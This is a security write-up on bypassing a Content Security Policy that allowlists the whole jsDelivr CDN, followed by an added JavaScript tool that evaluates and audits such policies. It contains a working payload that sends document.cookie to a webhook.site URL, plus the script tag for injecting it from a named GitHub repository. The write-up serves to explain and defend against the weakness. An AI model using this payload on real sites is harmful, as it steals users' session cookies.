Content Security Policy (CSP)
Imagine a website that has the following Content Security Policy (CSP):
script-src 'self' https://cdn.jsdelivr.net; style-src 'self' https://fonts.googleapis.com; img-src 'self'; font-src 'self' https://fonts.gstatic.com; child-src 'self'; frame-src 'self'; worker-src 'self'; frame-ancestors 'self'; form-action 'self'; base-uri 'self'; manifest-src 'self'
In this case, the website allows scripts from itself and from jsDelivr. Because jsDelivr serves any file from any public GitHub repository or npm package, allowlisting the whole host means we can publish our own script there and the browser will execute it without violating the policy.
Proof of Concept
We will create a simple fetch that sends the cookie to our webhook (document.cookie only exposes cookies that are not flagged HttpOnly).
fetch('https://webhook.site/ba970b96-508e-4d79-8b29-45a987954c90?c=' + document.cookie)
We will upload this to a GitHub repository and host it through jsDelivr.
Result
We then reference the file through jsDelivr's GitHub URL format, pinned to a commit hash so the served content cannot change underneath us:
https://cdn.jsdelivr.net/gh/USERNAME/REPOSITORY@COMMIT_HASH/FILE_PATH
My POC:
https://cdn.jsdelivr.net/gh/Vagebondcur/xss-jsdeliver@d96b9d94f1eea5d719d020b350e3fe111d796723/exploit.js
Given an HTML injection point on the target, we inject the script tag below; the browser loads and executes it because the source matches the allowlisted jsDelivr host.
<script src="https://cdn.jsdelivr.net/gh/Vagebondcur/xss-jsdeliver@d96b9d94f1eea5d719d020b350e3fe111d796723/exploit.js"></script>
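To make the weakness in the policy above concrete, here is an added example that is not part of the original write-up: a small JavaScript CSP evaluator that parses a policy, decides whether a given script URL is permitted by script-src, and flags allowlisted hosts that serve arbitrary user-uploaded content. It runs the write-up's exploit URL against the original policy and against a constructed hardened variant. The hardened policy, the jQuery path and the CDN list are assumptions made for this demonstration, not something the original page specifies.

```javascript
// Added example, not code from the original write-up: a minimal CSP evaluator
// and auditor. It parses a policy, decides whether a script URL is permitted by
// script-src, and flags allowlisted hosts that serve arbitrary user-uploaded
// content. The hardened policy, the jQuery path and the CDN list are
// constructed for this demonstration.

// The weak policy from the write-up: the whole jsDelivr host is allowlisted.
const POLICY_WEAK =
  "script-src 'self' https://cdn.jsdelivr.net; style-src 'self' https://fonts.googleapis.com; " +
  "img-src 'self'; font-src 'self' https://fonts.gstatic.com; child-src 'self'; frame-src 'self'; " +
  "worker-src 'self'; frame-ancestors 'self'; form-action 'self'; base-uri 'self'; manifest-src 'self'";

// Constructed hardened variant: only one exact file on the CDN is allowlisted.
// (A nonce- or hash-based script-src with 'strict-dynamic' is the more robust
// fix; browsers also skip path matching when the script URL redirects.)
const POLICY_HARDENED =
  "script-src 'self' https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.min.js; " +
  "style-src 'self' https://fonts.googleapis.com; img-src 'self'; " +
  "font-src 'self' https://fonts.gstatic.com; frame-ancestors 'self'; form-action 'self'; base-uri 'self'";

// CDNs that serve any file from any public npm package or GitHub repository
// (illustrative list; extend it for your environment).
const USER_CONTENT_CDNS = ["cdn.jsdelivr.net", "unpkg.com", "raw.githubusercontent.com"];

// host-source grammar (simplified): [scheme://]host[:port][/path]
const SOURCE_RE = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[a-z0-9-]+(?:\.[a-z0-9-]+)*)(?::(\d+|\*))?(\/\S*)?$/i;

// Split a policy into directives; as in the spec, a repeated directive is ignored.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

function defaultPort(protocol) {
  return protocol === "https:" ? "443" : protocol === "http:" ? "80" : "";
}

// Does one host-source expression match a URL object?
function hostSourceMatches(expr, url) {
  const m = SOURCE_RE.exec(expr);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  if (scheme && scheme.toLowerCase() + ":" !== url.protocol) return false;
  const h = host.toLowerCase();
  const target = url.hostname.toLowerCase();
  if (h === "*") {
    // bare wildcard: any network host
  } else if (h.startsWith("*.")) {
    const suffix = h.slice(1); // ".example.com"
    if (!target.endsWith(suffix) || target.length <= suffix.length) return false;
  } else if (h !== target) {
    return false;
  }
  const exprPort = port ?? defaultPort(scheme ? scheme.toLowerCase() + ":" : url.protocol);
  const urlPort = url.port || defaultPort(url.protocol);
  if (exprPort !== "*" && exprPort !== urlPort) return false;
  if (path) {
    // trailing slash: prefix match; otherwise the path must match exactly
    if (path.endsWith("/") ? !url.pathname.startsWith(path) : url.pathname !== path) return false;
  }
  return true;
}

// Would a <script src=scriptUrl> on a page at pageOrigin be allowed by this policy?
function isScriptAllowed(header, scriptUrl, pageOrigin) {
  const csp = parseCsp(header);
  const sources = csp.get("script-src") ?? csp.get("default-src");
  if (!sources) return true; // no governing directive
  const url = new URL(scriptUrl);
  const self = new URL(pageOrigin);
  for (const src of sources) {
    if (src === "'none'") return false;
    if (src === "'self'") {
      if (url.origin === self.origin) return true;
      continue;
    }
    if (src.startsWith("'")) continue; // nonce/hash/keyword: not host-based
    if (hostSourceMatches(src, url)) return true;
  }
  return false;
}

// Report host sources that allowlist a user-content CDN without pinning one file.
function auditScriptSrc(header) {
  const csp = parseCsp(header);
  const sources = csp.get("script-src") ?? csp.get("default-src") ?? [];
  const findings = [];
  for (const src of sources) {
    const m = SOURCE_RE.exec(src);
    if (!m) continue;
    const host = m[2].toLowerCase();
    const path = m[4];
    const hitsCdn = USER_CONTENT_CDNS.some(
      (cdn) => cdn === host || (host.startsWith("*.") && cdn.endsWith(host.slice(1))),
    );
    if (hitsCdn && !(path && !path.endsWith("/"))) findings.push(src);
  }
  return findings;
}
```

Running isScriptAllowed with the write-up's exploit URL returns true under POLICY_WEAK and false under POLICY_HARDENED, while auditScriptSrc(POLICY_WEAK) reports the bare https://cdn.jsdelivr.net entry. The evaluator is deliberately simplified (no nonce or hash verification, no redirect handling); its purpose is to show why a host-level allowlist for a public-content CDN is equivalent to allowing attacker-controlled script.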